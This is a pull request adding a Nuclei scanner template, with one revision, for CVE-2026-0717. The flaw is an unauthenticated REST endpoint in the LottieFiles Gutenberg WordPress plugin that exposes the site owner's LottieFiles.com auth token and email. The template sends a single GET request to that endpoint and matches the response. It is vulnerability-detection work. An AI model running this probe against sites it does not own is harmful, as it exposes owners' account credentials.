### PR TITLE
Add CVE-2026-0717 template

### DIFF
--- a/http/cves/2026/CVE-2026-0717.yaml
+++ b/http/cves/2026/CVE-2026-0717.yaml
@@ -1,0 +1,45 @@
+id: CVE-2026-0717
+
+info:
+  name: LottieFiles for Gutenberg <= 3.0.0 - Unauthenticated Settings Disclosure (CVE-2026-0717)
+  author: str4k3r
+  severity: medium
+  description: >
+    The LottieFiles - Lottie block for Gutenberg WordPress plugin through
+    3.0.0 registers its REST route lottiefiles/v1/settings/ with
+    permission_callback set to __return_true for GET, POST and DELETE,
+    letting an unauthenticated visitor read (and modify/delete) the
+    site's stored LottieFiles.com integration settings via
+    lottiefiles_getConfig(), which returns the raw lottie_config_admin
+    option (including the owner's LottieFiles.com auth token when
+    configured). Version 3.1.0 fixes this by adding real permission
+    callbacks: lottiefiles_settings_read_permission()
+    (is_user_logged_in()) for GET and
+    lottiefiles_settings_write_permission()
+    (current_user_can('edit_posts')) for POST/DELETE, so an
+    unauthenticated request to the same endpoint now returns HTTP 401.
+  reference:
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/19b159ca-4b41-48b4-880d-9b9dc44b3463?source=cve
+    - https://plugins.trac.wordpress.org/browser/lottiefiles/tags/3.0.0/src/common.php?marks=21,122#L21
+    - https://plugins.trac.wordpress.org/changeset/3442469/
+  classification:
+    cve-id: CVE-2026-0717
+  metadata:
+    verified: true
+    verification_status: VERIFIED
+    max-request: 1
+  tags: cve,cve2026,wordpress,lottiefiles,gutenberg,exposure,unauth
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-json/lottiefiles/v1/settings/"
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        part: body
+        words:
+          - "is_block_logged_in"

--- a/http/cves/2026/CVE-2026-0717.yaml
+++ b/http/cves/2026/CVE-2026-0717.yaml
@@ -1,23 +1,15 @@
 id: CVE-2026-0717
 
 info:
-  name: LottieFiles for Gutenberg <= 3.0.0 - Unauthenticated Settings Disclosure (CVE-2026-0717)
+  name: LottieFiles for Gutenberg <= 3.0.0 - Unauthenticated Settings Disclosure
   author: str4k3r
   severity: medium
-  description: >
-    The LottieFiles - Lottie block for Gutenberg WordPress plugin through
-    3.0.0 registers its REST route lottiefiles/v1/settings/ with
-    permission_callback set to __return_true for GET, POST and DELETE,
-    letting an unauthenticated visitor read (and modify/delete) the
-    site's stored LottieFiles.com integration settings via
-    lottiefiles_getConfig(), which returns the raw lottie_config_admin
-    option (including the owner's LottieFiles.com auth token when
-    configured). Version 3.1.0 fixes this by adding real permission
-    callbacks: lottiefiles_settings_read_permission()
-    (is_user_logged_in()) for GET and
-    lottiefiles_settings_write_permission()
-    (current_user_can('edit_posts')) for POST/DELETE, so an
-    unauthenticated request to the same endpoint now returns HTTP 401.
+  description: |
+    The LottieFiles – Lottie block for Gutenberg plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.0.0 via the `/wp-json/lottiefiles/v1/settings/` REST API endpoint. This makes it possible for unauthenticated attackers to retrieve the site owner's LottieFiles.com account credentials including their API access token and email address when the 'Share LottieFiles account with other WordPress users' option is enabled.
+  impact: |
+    Unauthenticated attackers can retrieve API tokens and email addresses, compromising account security and privacy.
+  remediation: |
+    Update to the latest version beyond 3.0.0.
   reference:
     - https://www.wordfence.com/threat-intel/vulnerabilities/id/19b159ca-4b41-48b4-880d-9b9dc44b3463?source=cve
     - https://plugins.trac.wordpress.org/browser/lottiefiles/tags/3.0.0/src/common.php?marks=21,122#L21
@@ -26,7 +18,6 @@ info:
     cve-id: CVE-2026-0717
   metadata:
     verified: true
-    verification_status: VERIFIED
     max-request: 1
   tags: cve,cve2026,wordpress,lottiefiles,gutenberg,exposure,unauth
 
@@ -34,12 +25,14 @@ http:
   - method: GET
     path:
       - "{{BaseURL}}/wp-json/lottiefiles/v1/settings/"
+
     matchers-condition: and
     matchers:
-      - type: status
-        status:
-          - 200
       - type: word
         part: body
         words:
           - "is_block_logged_in"
+
+      - type: status
+        status:
+          - 200


### PR DESCRIPTION
Adds the Nuclei template for **CVE-2026-0717** as an ecosystem contribution.
The template follows the repository format and references the public advisory.